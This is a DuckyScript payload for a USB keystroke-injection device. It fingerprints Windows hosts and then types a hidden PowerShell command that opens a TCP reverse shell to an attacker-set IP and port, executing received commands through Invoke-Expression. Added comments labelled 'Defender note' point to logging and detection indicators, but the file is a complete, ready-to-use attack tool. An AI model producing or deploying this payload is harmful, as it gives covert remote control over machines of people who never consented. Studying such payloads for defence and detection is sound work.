REM ReverseDuckyII
REM Version 2.0
REM OS: Windows / Multi
REM Author: 0i41E
REM Requirement: DuckyScript 3.0
REM TCP Reverse shell executed hidden in the background, the CAPSLOCK light at the end will indicate that the payload was executed.
REM If inserted into a non-Windows machine, the Ducky will appear broken (the payload switches to ATTACKMODE OFF).
REM DON'T FORGET TO START LISTENER
REM PASSIVE_WINDOWS_DETECT extension, made by Korben, to identify the OS
REM Purpose: classify the host as WINDOWS or NOT_WINDOWS without typing anything,
REM using only values the device observes during USB enumeration.
REM Result: $_OS is written once, at the end of the extension.
EXTENSION PASSIVE_WINDOWS_DETECT
REM VERSION 1.0

REM Windows fully passive OS Detection and passive Detect Ready
REM Includes its own passive detect ready. Does not require
REM additional extensions

REM USAGE:
REM Extension runs inline (here)
REM Place at beginning of payload (besides ATTACKMODE) to act as dynamic
REM boot delay
REM $_OS will be set to WINDOWS or NOT_WINDOWS

REM CONFIGURATION:
REM MAX_WAIT is the number of polling iterations and CHECK_INTERVAL the delay per
REM iteration, so the wait below is bounded at 150 x 20 = 3000 (DELAY units, milliseconds).
DEFINE MAX_WAIT 150
DEFINE CHECK_INTERVAL 20
REM Threshold for the classification: more than this many configuration requests => WINDOWS.
DEFINE WINDOWS_HOST_REQUEST_COUNT 2
REM Value stored in $_OS for every host that does not pass the threshold.
REM WINDOWS itself is not defined in this block - presumably a DuckyScript built-in constant; confirm.
DEFINE NOT_WINDOWS 7

REM Countdown for the readiness loop.
VAR $MAX_TRIES = MAX_WAIT
REM Poll until the host has answered with a lock-LED reply or the countdown hits 0.
REM The loop also ends on timeout, so the check below runs even if no reply was seen.
WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
DELAY CHECK_INTERVAL
$MAX_TRIES = ($MAX_TRIES - 1)
END_WHILE
REM Heuristic only: the sole input is the configuration-request counter.
REM NOTE(review): any host that issues more than WINDOWS_HOST_REQUEST_COUNT requests is
REM labelled WINDOWS, whatever it actually runs - the result is a guess, not an identification.
IF ($_HOST_CONFIGURATION_REQUEST_COUNT > WINDOWS_HOST_REQUEST_COUNT) THEN
$_OS = WINDOWS
ELSE
$_OS = NOT_WINDOWS
END_IF

REM EXAMPLE USAGE AFTER EXTENSION
REM IF ($_OS == WINDOWS) THEN
REM STRING HELLO WINDOWS!
REM ELSE
REM STRING HELLO WORLD!
REM END_IF
END_EXTENSION
REM Configure your settings below:
REM Insert the attacking IP between '' & define your port
REM ATTACKER and PORT are substituted into the TCPClient call typed further down, so they
REM are the destination address and TCP port of the outbound connection the target makes.
REM Defender note: for a given build of this payload these two values are its network
REM indicators. The address shown is a private-range (RFC 1918) sample value.
DEFINE ATTACKER '192.168.178.25'
DEFINE PORT 4444
REM Set the default DELAY
REM WAIT is the pause (DELAY units, milliseconds) after opening the Run dialog and after
REM launching PowerShell.
DEFINE WAIT 500
REM Main payload. Everything below is typed keystrokes: the order and the delays matter,
REM and nothing here checks whether a typed command actually ran.
REM Runs only when the extension above has set $_OS to WINDOWS.
IF ($_OS == WINDOWS) THEN
REM Extra fixed pause before the first keystroke.
DELAY 1500
REM Windows key + R: opens the Run dialog.
REM Defender note: commands entered in the Run dialog are recorded per user under
REM HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU.
GUI r
DELAY WAIT
REM Types the command and presses Enter. The switches are the short forms of
REM -NoProfile, -NonInteractive and -WindowStyle Hidden, so the console window is not shown.
REM Defender note: process-creation logging (where enabled) shows powershell.exe started
REM with these arguments; match them case-insensitively and in abbreviated form.
STRINGLN powershell -NoP -NonI -w h
DELAY WAIT
REM Types a one-liner into that PowerShell session. As written it: opens a TCP client to
REM ATTACKER:PORT, reads from the stream into a 65536-byte buffer, passes each chunk
REM received to iex (Invoke-Expression), sends back the output followed by a
REM "Ducky@PS <cwd>> " prompt, repeats until a read returns 0, then closes the client and exits.
REM The cmdlet and type names are in mixed case; PowerShell resolves them regardless of
REM case, so detections on this content need case-insensitive matching.
REM Defender note: PowerShell script block logging (event ID 4104, where enabled) records
REM the executed text; the network side is an outbound TCP connection from powershell.exe.
STRINGLN $c=nEw-oBjECt SYstEm.NEt.SOcKEts.TCPClIEnt( ATTACKER , PORT );$s=$c.GetSTreAm();[byte[]]$b=0..65535|%{0};whILe(($i=$s.REad($b,0,$b.LeNgTh))-ne 0){;$d=(NEw-OBjeCT -TYpeNamE sYsTeM.TeXt.ASCIIEncoding).GetStRIng($b,0,$i);$z=(ieX $d 2>&1|oUt-STriNG);$x=$z+"Ducky@PS "+(pwd)+"> ";$y=([text.encoding]::ASCII).GEtByTEs($x);$s.WrIte($y,0,$y.LEnGTh);$s.FlUSh()};$c.CloSE();exit
REM Capslock light will indicate a finished payload
REM The key press follows the typing unconditionally: it shows that the keystrokes were
REM sent, not that the connection was established.
CAPSLOCK
ELSE
REM Inserting the Ducky into a non Windows machine will result in ATTACKMODE OFF
REM No keystrokes are sent on this branch.
ATTACKMODE OFF
END_IF